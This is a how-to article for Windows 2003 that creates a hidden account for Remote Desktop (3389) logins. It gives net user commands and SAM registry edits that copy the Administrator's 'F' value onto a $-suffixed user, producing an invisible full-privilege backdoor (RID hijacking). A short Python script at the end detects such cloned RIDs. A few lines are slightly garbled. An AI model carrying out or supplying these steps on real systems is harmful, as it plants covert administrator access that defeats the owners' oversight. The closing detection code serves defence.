Windows 2003: creating a hidden account for logging in over 3389
---

First create the user cnlnfjhh$:

    c:\> net user cnlnfjhh$ wrsky /add

The trailing $ is added so that the account is not listed by net user at the console.

Then run regedt32.exe (note that it is not regedit.exe). Find HKEY_LOCAL_MACHINE\SAM\SAM and select it, then in the menu "Security" -> "Permissions" add the account you are logged in with, tick "Full Control" -> "Allow" under the permissions, and confirm. The local SAM information can now be read directly.

Now run regedit.exe and open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$. Its default value has the type "0x3f1". Export the corresponding keys as follows:

    HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$  ->  cnlnfjhh$.reg
    HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1         ->  3f1.reg
    HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4         ->  lf4.reg (the key corresponding to the Administrator account)

Open lf4.reg with Notepad and find the "F" value, which in this example is:

    "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
      00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
      f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
      00,00,00,00,00,00,00

Copy it, then open 3f1.reg, find its "F" value, delete it, and paste the copied value in its place.

Open cnlnfjhh$.reg and copy its contents, which in this example are:

    [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]
    @=hex(3f1):

Go back to 3f1.reg and paste this at the end of the file.
The resulting file is as follows:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]
    "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
      00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
      f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
      00,00,00,00,00,00,00
    "V"=hex: (the "V" value exactly as exported for 000003F1; it is not edited)

    [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]
    @=hex(3f1):

After saving, delete the cnlnfjhh$ user:

    c:\> net user cnlnfjhh$ /delete

Run regedit.exe and import the modified 3f1.reg file. Finally, open regedt32.exe, find HKEY_LOCAL_MACHINE\SAM\SAM and select it, then in the menu "Security" -> "Permissions" remove the account you added earlier. Log out the current user; logging in with cnlnfjhh/wrsky then gives the highest privileges.

The Windows 2003 clone method is slightly different from the 2000 clone. It is the first part of my article. This creates an account cnlnfjhh$ that is not visible with net user at the console or in "Computer Management". Set the password again, don't change the password.
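The end state of this procedure can be checked for directly. The following is an added example, not part of the original article: it parses a .reg export of the Users keys and reports every key whose "F" value carries a RID different from the key's own name. It assumes the RID is the 32-bit little-endian field at offset 0x30 of "F" (where the page's Administrator export has f4,01,00,00); the sample export, including the ordinary account 000003E8, is constructed.

```python
import re
import struct

RID_OFFSET = 0x30  # assumption: 32-bit little-endian RID field inside "F"

# "F" value as printed on the page (exported from 000001F4).
PAGE_F = r'''"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
  00,00,00,00,00,00,00'''
KEY = "[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\%s]\n"
# Constructed sample export: 000003F1 carries the Administrator "F" value as in
# the page's 3f1.reg; 000003E8 is a made-up ordinary account for contrast.
SAMPLE_REG = ("Windows Registry Editor Version 5.00\n\n"
              + KEY % "000001F4" + PAGE_F + "\n\n"
              + KEY % "000003E8" + PAGE_F.replace("f4,01,00,00", "e8,03,00,00") + "\n\n"
              + KEY % "000003F1" + PAGE_F + "\n\n"
              + KEY % "Names\\cnlnfjhh$" + "@=hex(3f1):\n")


def parse_users(reg_text):
    """Map the RID in each Users\\<8 hex digits> key name to its "F" bytes."""
    text = re.sub(r"\\\r?\n\s*", "", reg_text)  # join "\"-continued hex lines
    users, rid = {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("["):
            m = re.search(r"\\Account\\Users\\([0-9A-Fa-f]{8})\]$", line)
            rid = int(m.group(1), 16) if m else None
        elif rid is not None and line.lower().startswith('"f"=hex:'):
            users[rid] = bytes.fromhex(line.split(":", 1)[1].replace(",", ""))
    return users


def find_cloned(reg_text):
    """Return (key_rid, f_rid) pairs where "F" holds another account's RID."""
    hits = []
    for key_rid, f_value in sorted(parse_users(reg_text).items()):
        if len(f_value) < RID_OFFSET + 4:
            continue  # truncated value, cannot be judged
        (f_rid,) = struct.unpack_from("<I", f_value, RID_OFFSET)
        if f_rid != key_rid:
            hits.append((key_rid, f_rid))
    return hits


if __name__ == "__main__":
    for key_rid, f_rid in find_cloned(SAMPLE_REG):
        print(f"Users\\{key_rid:08X}: F carries RID 0x{f_rid:X} -> cloned identity")
```

On a live host the export has to be taken with SYSTEM rights or from an offline copy of the SAM hive, since the SAM key is not readable by administrators by default.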